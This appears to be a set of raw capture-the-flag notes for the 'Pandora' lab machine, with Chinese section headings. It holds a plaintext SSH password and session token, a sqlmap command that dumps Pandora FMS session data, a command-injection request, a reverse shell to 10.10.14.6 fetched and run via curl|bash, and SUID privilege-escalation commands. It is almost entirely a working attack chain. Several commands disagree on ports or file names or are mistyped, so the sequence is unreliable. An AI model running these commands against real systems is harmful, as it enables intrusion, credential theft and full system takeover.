Pandora
10.129.134.46
ssh daniel@10.129.134.46
HotelBabylon23
g4e01qdgk36mfdh90hvcc54umq
配置端口转发
ssh -fgN -L 8989:localhost:80 daniel@10.129.134.46
配置proxychains
sudo vim /etc/proxychains.con
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 9098 daniel HotelBabylon23
sqlmap
sqlmap --url="http://10.129.134.46:8989/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump --batch
POST /pandora_console/ajax.php HTTP/1.1
page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1
反弹shell
$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/1337 0>&1
$ ls
shll.sh
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$ nc -nvlp 9999
payload
$ curl+10.10.14.6:80/shell.sh|bash
权限提升
查找所有带有SUID权限的文件
$ find / -perm -4000 2>/dev/null
$ ls -al /usr/bin/pandora_backup
$ /usr/bin/pandora_backup
$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
$ python -c "import pty;pty.spawn('/bin/bash')"